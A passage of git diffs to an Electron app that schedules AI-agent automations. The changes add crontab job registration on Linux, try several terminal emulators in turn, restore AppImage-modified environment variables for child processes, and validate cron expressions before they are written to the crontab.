   if (fs.existsSync(scriptPath)) {
     fs.unlinkSync(scriptPath);
@@ -562,11 +539,13 @@ export function registerAutomationHandlers(): void {
         outputs,
       };
 
+      // Register the job before persisting: if the schedule is rejected or the
+      // crontab write fails, nothing is stored, so the UI never shows an enabled
+      // automation that has no job behind it.
+      await registerAutomationJob(newAutomation);
+
       automations.push(newAutomation);
       saveAutomations(automations);
-
-      // Register the scheduled job (launchd on macOS, crontab elsewhere)
-      await registerAutomationJob(newAutomation);
 
       return { success: true, automationId: newAutomation.id };
     } catch (err) {
@@ -589,6 +568,16 @@ export function registerAutomationHandlers(): void {
 
       const wasEnabled = automations[index].enabled;
 
+      // Apply the job change first — persisting an enabled flag whose job failed
+      // to register would leave the two permanently disagreeing.
+      if (params.enabled !== undefined && params.enabled !== wasEnabled) {
+        if (params.enabled) {
+          await registerAutomationJob({ ...automations[index], enabled: true });
+        } else {
+          await unregisterAutomationJob(id);
+        }
+      }
+
       if (params.enabled !== undefined) {
         automations[index].enabled = params.enabled;
       }
@@ -598,15 +587,6 @@ export function registerAutomationHandlers(): void {
       automations[index].updatedAt = new Date().toISOString();
 
       saveAutomations(automations);
-
-      // Handle enable/disable of the scheduled job
-      if (params.enabled !== undefined && params.enabled !== wasEnabled) {
-        if (params.enabled) {
-          await registerAutomationJob(automations[index]);
-        } else {
-          await unregisterAutomationJob(id);
-        }
-      }
 
       return { success: true };
     } catch (err) {
@@ -629,6 +609,7 @@ export function registerAutomationHandlers(): void {
 
       // Remove the scheduled job (launchd on macOS, crontab elsewhere)
       await unregisterAutomationJob(id);
+      deleteAutomationScript(id);
 
       return { success: true };
     } catch (err) {

--- a/electron/handlers/automation-handlers.ts
+++ b/electron/handlers/automation-handlers.ts
@@ -223,8 +223,24 @@ async function getClaudePath(): Promise<string> {
   return getCLIPath('claude');
 }
 
-// Create launchd job for automation (macOS)
-async function createAutomationLaunchdJob(automation: Automation): Promise<void> {
+function automationScriptPath(automationId: string): string {
+  return path.join(os.homedir(), '.dorothy', 'scripts', `automation-${automationId}.sh`);
+}
+
+// Marker appended to the crontab line so it can be found again on disable/delete.
+// Distinct from the scheduler's `dorothy-<taskId>` so neither can match the other.
+function automationCronMarker(automationId: string): string {
+  return `dorothy-automation-${automationId}`;
+}
+
+// Write the runner script both the launchd job and the cron job point at.
+// `automation:run` executes the same script, so it is needed on every platform.
+async function writeAutomationScript(automation: Automation): Promise<{
+  scriptPath: string;
+  logPath: string;
+  errorLogPath: string;
+  cronSchedule: string;
+}> {
   const automationProvider: AgentProvider = automation.agent.provider || getDefaultProvider();
   const claudePath = await getCLIPath(automationProvider);
   const claudeDir = path.dirname(claudePath);
@@ -237,8 +253,6 @@ async function createAutomationLaunchdJob(automation: Automation): Promise<void>
     cronSchedule = intervalToCron(automation.schedule.intervalMinutes || 60);
   }
 
-  const [minute, hour, dayOfMonth, , dayOfWeek] = cronSchedule.split(' ');
-
   const logPath = path.join(os.homedir(), '.dorothy', 'logs', `automation-${automation.id}.log`);
   const errorLogPath = path.join(os.homedir(), '.dorothy', 'logs', `automation-${automation.id}.error.log`);
   const logsDir = path.dirname(logPath);
@@ -247,7 +261,7 @@ async function createAutomationLaunchdJob(automation: Automation): Promise<void>
   }
 
   // Create script to run
-  const scriptPath = path.join(os.homedir(), '.dorothy', 'scripts', `automation-${automation.id}.sh`);
+  const scriptPath = automationScriptPath(automation.id);
   const scriptsDir = path.dirname(scriptPath);
   if (!fs.existsSync(scriptsDir)) {
     fs.mkdirSync(scriptsDir, { recursive: true });
@@ -275,6 +289,15 @@ async function createAutomationLaunchdJob(automation: Automation): Promise<void>
 
   fs.writeFileSync(scriptPath, scriptContent);
   fs.chmodSync(scriptPath, '755');
+
+  return { scriptPath, logPath, errorLogPath, cronSchedule };
+}
+
+// Create launchd job for automation (macOS)
+async function createAutomationLaunchdJob(automation: Automation): Promise<void> {
+  const { scriptPath, logPath, errorLogPath, cronSchedule } = await writeAutomationScript(automation);
+
+  const [minute, hour, dayOfMonth, , dayOfWeek] = cronSchedule.split(' ');
 
   // Build StartCalendarInterval or StartInterval
   const label = `com.dorothy.automation.${automation.id}`;
@@ -341,7 +364,7 @@ ${scheduleXml}
 async function removeAutomationLaunchdJob(automationId: string): Promise<void> {
   const label = `com.dorothy.automation.${automationId}`;
   const plistPath = path.join(os.homedir(), 'Library', 'LaunchAgents', `${label}.plist`);
-  const scriptPath = path.join(os.homedir(), '.dorothy', 'scripts', `automation-${automationId}.sh`);
+  const scriptPath = automationScriptPath(automationId);
 
   // Unload from launchd
   const uid = process.getuid?.() || 501;
@@ -359,6 +382,82 @@ async function removeAutomationLaunchdJob(automationId: string): Promise<void> {
   // Remove script file
   if (fs.existsSync(scriptPath)) {
     fs.unlinkSync(scriptPath);
+  }
+}
+
+// Read the current crontab. An empty crontab and a missing `crontab` binary both
+// read as empty, matching how the scheduler treats them.
+function readCrontab(): Promise<string> {
+  return new Promise((resolve) => {
+    const proc = spawn('crontab', ['-l']);
+    let output = '';
+    proc.stdout.on('data', (data) => { output += data; });
+    proc.on('close', () => resolve(output));
+    proc.on('error', () => resolve(''));
+  });
+}
+
+function writeCrontab(content: string): Promise<void> {
+  return new Promise((resolve, reject) => {
+    const proc = spawn('crontab', ['-']);
+    proc.stdin.write(content);
+    proc.stdin.end();
+    proc.on('close', (code) => {
+      if (code === 0) resolve();
+      else reject(new Error(`crontab failed with code ${code}`));
+    });
+    proc.on('error', reject);
+  });
+}
+
+function withoutMarker(crontab: string, marker: string): string[] {
+  const lines = crontab.split('\n').filter(line => !line.includes(marker));
+  while (lines.length > 0 && lines[lines.length - 1].trim() === '') {
+    lines.pop();
+  }
+  return lines;
+}
+
+// Create cron job for automation (Linux)
+async function createAutomationCronJob(automation: Automation): Promise<void> {
+  const { scriptPath, cronSchedule } = await writeAutomationScript(automation);
+  const marker = automationCronMarker(automation.id);
+
+  const lines = withoutMarker(await readCrontab(), marker);
+  lines.push(`${cronSchedule} ${scriptPath} # ${marker}`);
+
+  await writeCrontab(lines.join('\n') + '\n');
+}
+
+// Remove cron job for automation (Linux)
+async function removeAutomationCronJob(automationId: string): Promise<void> {
+  const marker = automationCronMarker(automationId);
+  const existing = await readCrontab();
+
+  if (existing.includes(marker)) {
+    const lines = withoutMarker(existing, marker);
+    await writeCrontab(lines.length > 0 ? lines.join('\n') + '\n' : '');
+  }
+
+  const scriptPath = automationScriptPath(automationId);
+  if (fs.existsSync(scriptPath)) {
+    fs.unlinkSync(scriptPath);
+  }
+}
+
+async function registerAutomationJob(automation: Automation): Promise<void> {
+  if (os.platform() === 'darwin') {
+    await createAutomationLaunchdJob(automation);
+  } else {
+    await createAutomationCronJob(automation);
+  }
+}
+
+async function unregisterAutomationJob(automationId: string): Promise<void> {
+  if (os.platform() === 'darwin') {
+    await removeAutomationLaunchdJob(automationId);
+  } else {
+    await removeAutomationCronJob(automationId);
   }
 }
 
@@ -459,10 +558,8 @@ export function registerAutomationHandlers(): void {
       automations.push(newAutomation);
       saveAutomations(automations);
 
-      // Create launchd job on macOS
-      if (os.platform() === 'darwin') {
-        await createAutomationLaunchdJob(newAutomation);
-      }
+      // Register the scheduled job (launchd on macOS, crontab elsewhere)
+      await registerAutomationJob(newAutomation);
 
       return { success: true, automationId: newAutomation.id };
     } catch (err) {
@@ -495,14 +592,12 @@ export function registerAutomationHandlers(): void {
 
       saveAutomations(automations);
 
-      // Handle enable/disable of launchd job
-      if (os.platform() === 'darwin' && params.enabled !== undefined && params.enabled !== wasEnabled) {
+      // Handle enable/disable of the scheduled job
+      if (params.enabled !== undefined && params.enabled !== wasEnabled) {
         if (params.enabled) {
-          // Re-create the launchd job
-          await createAutomationLaunchdJob(automations[index]);
+          await registerAutomationJob(automations[index]);
         } else {
-          // Remove the launchd job
-          await removeAutomationLaunchdJob(id);
+          await unregisterAutomationJob(id);
         }
       }
 
@@ -525,10 +620,8 @@ export function registerAutomationHandlers(): void {
       automations.splice(index, 1);
       saveAutomations(automations);
 
-      // Remove launchd job on macOS
-      if (os.platform() === 'darwin') {
-        await removeAutomationLaunchdJob(id);
-      }
+      // Remove the scheduled job (launchd on macOS, crontab elsewhere)
+      await unregisterAutomationJob(id);
 
       return { success: true };
     } catch (err) {
@@ -547,7 +640,7 @@ export function registerAutomationHandlers(): void {
       }
 
       // Run the script directly
-      const scriptPath = path.join(os.homedir(), '.dorothy', 'scripts', `automation-${id}.sh`);
+      const scriptPath = automationScriptPath(id);
       if (fs.existsSync(scriptPath)) {
         spawn('bash', [scriptPath], {
           detached: true,

--- a/electron/handlers/cli-paths-handlers.ts
+++ b/electron/handlers/cli-paths-handlers.ts
@@ -5,6 +5,7 @@ import * as os from 'os';
 import { exec } from 'child_process';
 import { promisify } from 'util';
 import type { AppSettings, CLIPaths } from '../types';
+import { resolveShell } from '../utils/resolve-shell';
 
 const execAsync = promisify(exec);
 
@@ -39,7 +40,7 @@ async function detectCLIPaths(savedPaths?: Partial<CLIPaths>): Promise<{ claude:
   // Try to get the full interactive shell PATH (includes .zshrc/.bashrc paths)
   let shellPath = process.env.PATH || '';
   try {
-    const shell = process.env.SHELL || '/bin/zsh';
+    const shell = resolveShell();
     const { stdout } = await execAsync(`${shell} -ilc 'echo $PATH'`, { timeout: 5000 });
     if (stdout.trim()) {
       shellPath = stdout.trim();

--- a/electron/handlers/ipc-handlers.ts
+++ b/electron/handlers/ipc-handlers.ts
@@ -22,6 +22,7 @@ import { writeProgrammaticInput } from '../core/pty-manager';
 import { extractStatusLine } from '../utils/ansi';
 import { scheduleTick } from '../utils/agents-tick';
 import { resolveShell } from '../utils/resolve-shell';
+import { spawn } from 'child_process';
 
 /**
  * Normalize a JIRA domain value to a full hostname.
@@ -2033,6 +2034,84 @@ function findExecutable(name: string): string | null {
   return null;
 }
 
+/**
+ * An AppImage's AppRun points these at its own mount, and a child that inherits
+ * them loads the bundled glibc/Qt — which breaks the child outright, and breaks
+ * it again the moment the AppImage exits and the mount disappears. AppRun saves
+ * the originals as <VAR>_ORIG, so restore those and drop the rest.
+ */
+function environmentForDetachedChild(): NodeJS.ProcessEnv {
+  const env: NodeJS.ProcessEnv = { ...process.env };
+  if (!env.APPDIR) return env;
+
+  const leaked = [
+    'LD_LIBRARY_PATH', 'LD_PRELOAD', 'PYTHONPATH', 'PYTHONHOME', 'PERLLIB',
+    'GSETTINGS_SCHEMA_DIR', 'QT_PLUGIN_PATH', 'XDG_DATA_DIRS', 'GI_TYPELIB_PATH',
+    'GDK_PIXBUF_MODULE_FILE',
+  ];
+  for (const key of leaked) {
+    const original = env[`${key}_ORIG`];
+    if (original !== undefined) env[key] = original;
+    else delete env[key];
+    delete env[`${key}_ORIG`];
+  }
+  delete env.APPDIR;
+  delete env.APPIMAGE;
+  delete env.ARGV0;
+  delete env.OWD;
+  return env;
+}
+
+/**
+ * Launch one emulator and decide whether it actually took the job.
+ *
+ * 'spawn' only means the binary was exec'd — an emulator that rejects the
+ * argument form execs fine and then exits non-zero, which would otherwise look
+ * like success. Exiting 0 straight away is normal for the client/server ones
+ * (they hand off to a running server), so only a non-zero exit counts as
+ * failure; anything still alive after the grace period is working.
+ */
+function launchTerminal(
+  binPath: string,
+  bin: string,
+  args: string[],
+  cwd: string,
+): Promise<{ success: true } | { success: false; error: string }> {
+  return new Promise((resolve) => {
+    let settled = false;
+    const settle = (result: { success: true } | { success: false; error: string }) => {
+      if (settled) return;
+      settled = true;
+      clearTimeout(grace);
+      resolve(result);
+    };
+
+    let child: import('child_process').ChildProcess;
+    try {
+      child = spawn(binPath, args, {
+        cwd,
+        detached: true,
+        stdio: 'ignore',
+        env: environmentForDetachedChild(),
+      });
+    } catch (err) {
+      resolve({ success: false, error: `${bin}: ${String(err)}` });
+      return;
+    }
+
+    const grace = setTimeout(() => {
+      child.unref();
+      settle({ success: true });
+    }, 400);
+
+    child.once('error', (err) => settle({ success: false, error: `${bin}: ${err.message}` }));
+    child.once('exit', (code) => {
+      if (code === 0) settle({ success: true });
+      else settle({ success: false, error: `${bin} exited with code ${code}` });
+    });
+  });
+}
+
 function registerShellHandlers(deps: IpcHandlerDependencies): void {
   const { quickPtyProcesses, getMainWindow } = deps;
 
@@ -2042,16 +2121,6 @@ function registerShellHandlers(deps: IpcHandlerDependencies): void {
     const escapedCwd = cwd.replace(/'/g, "'\\''");
 
     if (os.platform() !== 'darwin') {
-      const terminal = LINUX_TERMINALS.map(t => ({ ...t, binPath: findExecutable(t.bin) }))
-        .find(t => t.binPath !== null);
-
-      if (!terminal) {
-        return {
-          success: false,
-          error: `No terminal emulator found. Install one of: ${LINUX_TERMINALS.map(t => t.bin).join(', ')}.`,
-        };
-      }
-
       // The cwd goes through the payload as well as the emulator's own flag: a
       // client/server emulator opens the window from the server's directory, not
       // from this process's. The trailing exec keeps the window open afterwards,
@@ -2059,38 +2128,30 @@ function registerShellHandlers(deps: IpcHandlerDependencies): void {
       const payload = command
         ? `cd '${escapedCwd}' && ${command}; exec ${shell} -l`
         : `cd '${escapedCwd}'; exec ${shell} -l`;
-      const args = [...terminal.cwdArgs(cwd), ...terminal.execArgs(shell, payload)];
 
-      const { spawn } = await import('child_process');
+      const failures: string[] = [];
+      let found = false;
 
-      // spawn() reports failure asynchronously through an 'error' event, not by
-      // throwing — an unhandled one takes down the whole main process. Wait for
-      // either 'spawn' or 'error' so a deleted cwd or a missing binary comes back
-      // as a result instead of a crash.
-      return await new Promise<{ success: boolean; error?: string }>((resolve) => {
-        let child: import('child_process').ChildProcess;
-        try {
-          child = spawn(terminal.binPath as string, args, {
-            cwd,
-            detached: true,
-            stdio: 'ignore',
-            env: process.env,
-          });
-        } catch (err) {
-          resolve({ success: false, error: `Failed to launch ${terminal.bin}: ${String(err)}` });
-          return;
-        }
+      for (const terminal of LINUX_TERMINALS) {
+        const binPath = findExecutable(terminal.bin);
+        if (!binPath) continue;
+        found = true;
 
-        child.once('error', (err) => {
-          resolve({ success: false, error: `Failed to launch ${terminal.bin}: ${err.message}` });
-        });
+        const args = [...terminal.cwdArgs(cwd), ...terminal.execArgs(shell, payload)];
+        const result = await launchTerminal(binPath, terminal.bin, args, cwd);
+        if (result.success) return { success: true };
 
-        // The emulator outlives this call, so report success once it is launched.
-        child.once('spawn', () => {
-          child.unref();
-          resolve({ success: true });
-        });
-      });
+        // This one is installed but would not take the job — try the next.
+        failures.push(result.error);
+      }
+
+      if (!found) {
+        return {
+          success: false,
+          error: `No terminal emulator found. Install one of: ${LINUX_TERMINALS.map(t => t.bin).join(', ')}.`,
+        };
+      }
+      return { success: false, error: `Could not open a terminal. Tried: ${failures.join('; ')}` };
     }
 
     const script = command

--- a/electron/handlers/ipc-handlers.ts
+++ b/electron/handlers/ipc-handlers.ts
@@ -1989,13 +1989,94 @@ function registerTasmaniaHandlers(deps: IpcHandlerDependencies): void {
 
 // ============== Shell IPC Handlers ==============
 
+// Terminal emulators tried in order on Linux. `x-terminal-emulator` is the Debian
+// alternatives symlink, so it comes first and honours whatever the user picked;
+// Debian Policy requires anything registered there to accept `-e command args...`.
+// Each entry says how that emulator takes a working directory and a command —
+// the flags are not interchangeable between them.
+const LINUX_TERMINALS: Array<{
+  bin: string;
+  cwdArgs: (cwd: string) => string[];
+  execArgs: (shell: string, payload: string) => string[];
+}> = [
+  { bin: 'x-terminal-emulator', cwdArgs: () => [], execArgs: (s, p) => ['-e', s, '-lc', p] },
+  { bin: 'gnome-terminal', cwdArgs: (cwd) => [`--working-directory=${cwd}`], execArgs: (s, p) => ['--', s, '-lc', p] },
+  { bin: 'konsole', cwdArgs: (cwd) => ['--workdir', cwd], execArgs: (s, p) => ['-e', s, '-lc', p] },
+  { bin: 'xfce4-terminal', cwdArgs: (cwd) => [`--working-directory=${cwd}`], execArgs: (s, p) => ['-x', s, '-lc', p] },
+  { bin: 'alacritty', cwdArgs: (cwd) => ['--working-directory', cwd], execArgs: (s, p) => ['-e', s, '-lc', p] },
+  { bin: 'kitty', cwdArgs: (cwd) => ['--directory', cwd], execArgs: (s, p) => [s, '-lc', p] },
+  { bin: 'wezterm', cwdArgs: (cwd) => ['start', '--cwd', cwd], execArgs: (s, p) => ['--', s, '-lc', p] },
+  { bin: 'xterm', cwdArgs: () => [], execArgs: (s, p) => ['-e', s, '-lc', p] },
+];
+
+// A GUI Electron process can inherit a minimal PATH, so search the usual bin
+// directories too rather than trusting PATH alone.
+function findExecutable(name: string): string | null {
+  const dirs = [
+    ...(process.env.PATH || '').split(path.delimiter),
+    '/usr/local/bin',
+    '/usr/bin',
+    '/bin',
+    '/snap/bin',
+  ];
+  for (const dir of dirs) {
+    if (!dir) continue;
+    const candidate = path.join(dir, name);
+    try {
+      fs.accessSync(candidate, fs.constants.X_OK);
+      return candidate;
+    } catch {
+      // Not here — keep looking
+    }
+  }
+  return null;
+}
+
 function registerShellHandlers(deps: IpcHandlerDependencies): void {
   const { quickPtyProcesses, getMainWindow } = deps;
 
   // Open in external terminal
   ipcMain.handle('shell:open-terminal', async (_event, { cwd, command }: { cwd: string; command?: string }) => {
-    const shell = process.env.SHELL || '/bin/zsh';
+    const shell = process.env.SHELL || (os.platform() === 'darwin' ? '/bin/zsh' : '/bin/bash');
     const escapedCwd = cwd.replace(/'/g, "'\\''");
+
+    if (os.platform() !== 'darwin') {
+      const terminal = LINUX_TERMINALS.map(t => ({ ...t, binPath: findExecutable(t.bin) }))
+        .find(t => t.binPath !== null);
+
+      if (!terminal) {
+        return {
+          success: false,
+          error: `No terminal emulator found. Install one of: ${LINUX_TERMINALS.map(t => t.bin).join(', ')}.`,
+        };
+      }
+
+      // The cwd goes through the payload as well as the emulator's own flag: a
+      // client/server emulator opens the window from the server's directory, not
+      // from this process's. The trailing exec keeps the window open afterwards,
+      // the way Terminal.app's `do script` does.
+      const payload = command
+        ? `cd '${escapedCwd}' && ${command}; exec ${shell} -l`
+        : `cd '${escapedCwd}'; exec ${shell} -l`;
+      const args = [...terminal.cwdArgs(cwd), ...terminal.execArgs(shell, payload)];
+
+      try {
+        const { spawn } = await import('child_process');
+        const child = spawn(terminal.binPath as string, args, {
+          cwd,
+          detached: true,
+          stdio: 'ignore',
+          env: process.env,
+        });
+        child.unref();
+      } catch (err) {
+        return { success: false, error: `Failed to launch ${terminal.bin}: ${String(err)}` };
+      }
+
+      // The emulator outlives this call, so report success once it is launched.
+      return { success: true };
+    }
+
     const script = command
       ? `tell application "Terminal" to do script "cd '${escapedCwd}' && ${command}"`
       : `tell application "Terminal" to do script "cd '${escapedCwd}'"`;

--- a/electron/handlers/ipc-handlers.ts
+++ b/electron/handlers/ipc-handlers.ts
@@ -2061,21 +2061,36 @@ function registerShellHandlers(deps: IpcHandlerDependencies): void {
         : `cd '${escapedCwd}'; exec ${shell} -l`;
       const args = [...terminal.cwdArgs(cwd), ...terminal.execArgs(shell, payload)];
 
-      try {
-        const { spawn } = await import('child_process');
-        const child = spawn(terminal.binPath as string, args, {
-          cwd,
-          detached: true,
-          stdio: 'ignore',
-          env: process.env,
-        });
-        child.unref();
-      } catch (err) {
-        return { success: false, error: `Failed to launch ${terminal.bin}: ${String(err)}` };
-      }
+      const { spawn } = await import('child_process');
 
-      // The emulator outlives this call, so report success once it is launched.
-      return { success: true };
+      // spawn() reports failure asynchronously through an 'error' event, not by
+      // throwing — an unhandled one takes down the whole main process. Wait for
+      // either 'spawn' or 'error' so a deleted cwd or a missing binary comes back
+      // as a result instead of a crash.
+      return await new Promise<{ success: boolean; error?: string }>((resolve) => {
+        let child: import('child_process').ChildProcess;
+        try {
+          child = spawn(terminal.binPath as string, args, {
+            cwd,
+            detached: true,
+            stdio: 'ignore',
+            env: process.env,
+          });
+        } catch (err) {
+          resolve({ success: false, error: `Failed to launch ${terminal.bin}: ${String(err)}` });
+          return;
+        }
+
+        child.once('error', (err) => {
+          resolve({ success: false, error: `Failed to launch ${terminal.bin}: ${err.message}` });
+        });
+
+        // The emulator outlives this call, so report success once it is launched.
+        child.once('spawn', () => {
+          child.unref();
+          resolve({ success: true });
+        });
+      });
     }
 
     const script = command

--- a/electron/handlers/ipc-handlers.ts
+++ b/electron/handlers/ipc-handlers.ts
@@ -21,6 +21,7 @@ import { getProvider, getAllProviders } from '../providers';
 import { writeProgrammaticInput } from '../core/pty-manager';
 import { extractStatusLine } from '../utils/ansi';
 import { scheduleTick } from '../utils/agents-tick';
+import { resolveShell } from '../utils/resolve-shell';
 
 /**
  * Normalize a JIRA domain value to a full hostname.
@@ -133,7 +134,7 @@ function registerPtyHandlers(deps: IpcHandlerDependencies): void {
   // Create a new PTY terminal
   ipcMain.handle('pty:create', async (_event, { cwd, cols, rows }: { cwd?: string; cols?: number; rows?: number }) => {
     const id = uuidv4();
-    const shell = process.env.SHELL || '/bin/zsh';
+    const shell = resolveShell();
 
     const ptyProcess = pty.spawn(shell, ['-l'], {
       name: 'xterm-256color',
@@ -1119,7 +1120,7 @@ function registerPluginHandlers(deps: IpcHandlerDependencies): void {
   // contain broken completions like compdef from other tools)
   ipcMain.handle('plugin:install-start', async (_event, { command, cols, rows }: { command: string; cols?: number; rows?: number }) => {
     const id = uuidv4();
-    const shell = process.env.SHELL || '/bin/zsh';
+    const shell = resolveShell();
 
     // If the command starts with /, it's a Claude CLI slash command - prefix with 'claude'
     const finalCommand = command.startsWith('/') ? `claude "${command}"` : command;
@@ -2037,7 +2038,7 @@ function registerShellHandlers(deps: IpcHandlerDependencies): void {
 
   // Open in external terminal
   ipcMain.handle('shell:open-terminal', async (_event, { cwd, command }: { cwd: string; command?: string }) => {
-    const shell = process.env.SHELL || (os.platform() === 'darwin' ? '/bin/zsh' : '/bin/bash');
+    const shell = resolveShell();
     const escapedCwd = cwd.replace(/'/g, "'\\''");
 
     if (os.platform() !== 'darwin') {
@@ -2099,7 +2100,7 @@ function registerShellHandlers(deps: IpcHandlerDependencies): void {
   // Execute arbitrary command (uses PTY)
   ipcMain.handle('shell:exec', async (_event, { command, cwd }: { command: string; cwd?: string }) => {
     return new Promise((resolve) => {
-      const shell = process.env.SHELL || '/bin/zsh';
+      const shell = resolveShell();
       const ptyProcess = pty.spawn(shell, ['-l', '-c', command], {
         name: 'xterm-256color',
         cols: 80,
@@ -2127,7 +2128,7 @@ function registerShellHandlers(deps: IpcHandlerDependencies): void {
   // Start a new quick terminal PTY
   ipcMain.handle('shell:startPty', async (_event, { cwd, cols, rows }: { cwd?: string; cols?: number; rows?: number }) => {
     const id = uuidv4();
-    const shell = process.env.SHELL || '/bin/zsh';
+    const shell = resolveShell();
 
     const ptyProcess = pty.spawn(shell, ['-l'], {
       name: 'xterm-256color',

--- a/electron/handlers/scheduler-handlers.ts
+++ b/electron/handlers/scheduler-handlers.ts
@@ -6,6 +6,8 @@ import { spawn } from 'child_process';
 import { v4 as uuidv4 } from 'uuid';
 import { getMainWindow } from '../core/window-manager';
 import { getProvider } from '../providers';
+import { isValidCronExpression } from '../utils/cron-parser';
+import { readCrontab, writeCrontab, withoutMarkedLines, joinLines, markedLine } from '../utils/crontab';
 import type { AgentProvider, AgentStatus, AppSettings } from '../types';
 
 // ============================================
@@ -427,6 +429,10 @@ ${calendarIntervalXml}
   });
 }
 
+function schedulerCronMarker(taskId: string): string {
+  return `dorothy-${taskId}`;
+}
+
 // Create cron job (Linux)
 async function createCronJob(
   taskId: string,
@@ -436,6 +442,12 @@ async function createCronJob(
   autonomous: boolean,
   provider: AgentProvider = 'claude'
 ): Promise<void> {
+  // The schedule comes from schedules.json or an MCP tool, neither of which
+  // constrains it, and it is written into the user's crontab verbatim.
+  if (!isValidCronExpression(schedule)) {
+    throw new Error(`Invalid cron expression: ${JSON.stringify(schedule)}`);
+  }
+
   const claudePath = await getCLIPath(provider);
   const claudeDir = path.dirname(claudePath);
 
@@ -473,34 +485,11 @@ async function createCronJob(
   fs.writeFileSync(scriptPath, scriptContent);
   fs.chmodSync(scriptPath, '755');
 
-  const cronLine = `${schedule} ${scriptPath} # dorothy-${taskId}`;
+  const marker = schedulerCronMarker(taskId);
+  const lines = withoutMarkedLines(await readCrontab(), marker);
+  lines.push(markedLine(schedule, scriptPath, marker));
 
-  await new Promise<void>((resolve, reject) => {
-    const getCron = spawn('crontab', ['-l']);
-    let existingCron = '';
-    getCron.stdout.on('data', (data) => { existingCron += data; });
-    getCron.on('close', () => {
-      const newCron = existingCron + '\n' + cronLine + '\n';
-      const setCron = spawn('crontab', ['-']);
-      setCron.stdin.write(newCron);
-      setCron.stdin.end();
-      setCron.on('close', (code) => {
-        if (code === 0) resolve();
-        else reject(new Error(`crontab failed with code ${code}`));
-      });
-      setCron.on('error', reject);
-    });
-    getCron.on('error', () => {
-      const setCron = spawn('crontab', ['-']);
-      setCron.stdin.write(cronLine + '\n');
-      setCron.stdin.end();
-      setCron.on('close', (code) => {
-        if (code === 0) resolve();
-        else reject(new Error(`crontab failed with code ${code}`));
-      });
-      setCron.on('error', reject);
-    });
-  });
+  await writeCrontab(joinLines(lines));
 }
 
 /**
@@ -931,24 +920,12 @@ export function registerSchedulerHandlers(deps: SchedulerDeps): void {
         }
       } else {
         // Remove from crontab (Linux)
-        await new Promise<void>((resolve) => {
-          const getCron = spawn('crontab', ['-l']);
-          let existingCron = '';
-          getCron.stdout.on('data', (data) => { existingCron += data; });
-          getCron.on('close', () => {
-            const newCron = existingCron
-              .split('\n')
-              .filter(line => !line.includes(`dorothy-${taskId}`))
-              .join('\n');
-
-            const setCron = spawn('crontab', ['-']);
-            setCron.stdin.write(newCron);
-            setCron.stdin.end();
-            setCron.on('close', () => resolve());
-            setCron.on('error', () => resolve());
-          });
-          getCron.on('error', () => resolve());
-        });
+        try {
+          const existing = await readCrontab();
+          await writeCrontab(joinLines(withoutMarkedLines(existing, schedulerCronMarker(taskId))));
+        } catch (err) {
+          console.error('Failed to remove cron entry:', err);
+        }
       }
 
       // Remove script file
@@ -1079,24 +1056,14 @@ export function registerSchedulerHandlers(deps: SchedulerDeps): void {
           // Create new launchd job with updated schedule
           await createLaunchdJob(taskId, schedule, projectPath, prompt, autonomous, taskProvider);
         } else {
-          // Remove old cron entry
-          await new Promise<void>((resolve) => {
-            const getCron = spawn('crontab', ['-l']);
-            let existingCron = '';
-            getCron.stdout.on('data', (data: Buffer) => { existingCron += data; });
-            getCron.on('close', () => {
-              const newCron = existingCron
-                .split('\n')
-                .filter(line => !line.includes(`dorothy-${taskId}`))
-                .join('\n');
-              const setCron = spawn('crontab', ['-']);
-              setCron.stdin.write(newCron);
-              setCron.stdin.end();
-              setCron.on('close', () => resolve());
-              setCron.on('error', () => resolve());
-            });
-            getCron.on('error', () => resolve());
-          });
+          // Remove old cron entry — createCronJob re-adds it below, and it also
+          // replaces any line already carrying this marker.
+          try {
+            const existing = await readCrontab();
+            await writeCrontab(joinLines(withoutMarkedLines(existing, schedulerCronMarker(taskId))));
+          } catch (err) {
+            console.error('Failed to remove old cron entry:', err);
+          }
 
           // Create new cron job
           await createCronJob(taskId, schedule, projectPath, prompt, autonomous, taskProvider);

--- a/electron/main.ts
+++ b/electron/main.ts
@@ -95,6 +95,7 @@ import { registerTemplateHandlers } from './handlers/template-handlers';
 import { initVaultDb, closeVaultDb } from './services/vault-db';
 import { initAutoUpdater, checkForUpdates, setMainWindowGetter } from './services/update-checker';
 import { initKanbanAutomation, findMatchingAgent, createAgentForTask, startAgentForTask } from './services/kanban-automation';
+import { resolveShell } from './utils/resolve-shell';
 
 // Utils
 import {
@@ -431,7 +432,7 @@ app.whenReady().then(async () => {
       const pty = await import('node-pty');
 
       const id = uuidv4();
-      const shell = process.env.SHELL || '/bin/zsh';
+      const shell = resolveShell();
       let cwd = config.projectPath;
 
       if (!fs.existsSync(cwd)) {

--- a/electron/main.ts
+++ b/electron/main.ts
@@ -15,6 +15,19 @@ import * as fs from 'fs';
 import * as path from 'path';
 import * as os from 'os';
 
+// Launched from a .desktop entry there is no TTY behind stdout/stderr, so any
+// log write can fail with EPIPE and take the app down. Ignore just that; other
+// stream errors still surface as before.
+// Adapted from davebulaval's Linux packaging work in #44.
+if (process.platform === 'linux') {
+  const ignoreEpipe = (err: NodeJS.ErrnoException) => {
+    if (err.code === 'EPIPE') return;
+    throw err;
+  };
+  process.stdout.on('error', ignoreEpipe);
+  process.stderr.on('error', ignoreEpipe);
+}
+
 // Types
 import type { AppSettings, AgentStatus } from './types';
 

--- a/electron/utils/cron-parser.ts
+++ b/electron/utils/cron-parser.ts
@@ -164,37 +164,77 @@ export function parseCronToPreset(cron: string): ParsedCron {
   return result;
 }
 
+const MONTH_NAMES = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'];
+const DAY_NAMES = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'];
+
+const CRON_MACROS = new Set([
+  '@yearly', '@annually', '@monthly', '@weekly', '@daily', '@midnight', '@hourly', '@reboot',
+]);
+
+interface CronFieldSpec {
+  min: number;
+  max: number;
+  names?: string[];
+  nameBase?: number;
+}
+
+const CRON_FIELDS: CronFieldSpec[] = [
+  { min: 0, max: 59 },
+  { min: 0, max: 23 },
+  { min: 1, max: 31 },
+  { min: 1, max: 12, names: MONTH_NAMES, nameBase: 1 },
+  { min: 0, max: 7, names: DAY_NAMES, nameBase: 0 },
+];
+
+function cronToken(token: string, spec: CronFieldSpec): number | null {
+  if (spec.names) {
+    const named = spec.names.indexOf(token.toLowerCase());
+    if (named !== -1) return named + (spec.nameBase ?? 0);
+  }
+  if (!/^\d+$/.test(token)) return null;
+  const value = Number(token);
+  return value >= spec.min && value <= spec.max ? value : null;
+}
+
+function isValidCronField(field: string, spec: CronFieldSpec): boolean {
+  if (field === '') return false;
+
+  return field.split(',').every(part => {
